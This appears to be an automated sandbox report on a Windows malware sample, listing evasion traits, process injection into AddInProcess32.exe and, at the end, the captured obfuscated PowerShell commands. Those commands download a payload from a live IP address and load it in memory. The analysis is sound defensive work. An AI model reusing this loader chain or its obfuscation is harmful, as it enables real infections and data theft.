Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0040E54F Sleep,ExitProcess,

15_2_0040E54F

Contains functionality to enumerate running services

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

15_2_004198C2

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2065	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 830	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5149	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4584	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2754	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1805	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 2364	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 7226	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: foregroundWindowGot 1770	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016	Thread sleep count: 5149 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216	Thread sleep count: 4584 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep count: 2754 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448	Thread sleep count: 1805 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7560	Thread sleep count: 171 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7560	Thread sleep time: -85500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564	Thread sleep count: 2364 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564	Thread sleep time: -7092000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564	Thread sleep count: 7226 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7564	Thread sleep time: -21678000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\PING.EXE

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	15_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	15_2_0041B42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	15_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0044D5E9 FindFirstFileExA,	15_2_0044D5E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	15_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00406AC2 FindFirstFileW,FindNextFileW,	15_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	15_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,	15_2_00418C69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	15_2_00408DA7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp,
Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: powershell.exe, 00000007.00000002.1513412775.0000025F2893F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: PING.EXE, 0000000C.00000002.1349503253.000001B92B449000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

15_2_0043A65D

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00442554 mov eax, dword ptr fs:[00000030h]

15_2_00442554

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0044E92E GetProcessHeap,

15_2_0044E92E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00434168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0043A65D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00433B44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00433CD7 SetUnhandledExceptionFilter,	15_2_00433CD7

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ;			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 457000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 470000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 476000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47B000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: FF0008	Jump to behavior

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

15_2_00410F36

Contains functionality to simulate mouse events

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00418754 mouse_event,

15_2_00418754

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"	Jump to behavior
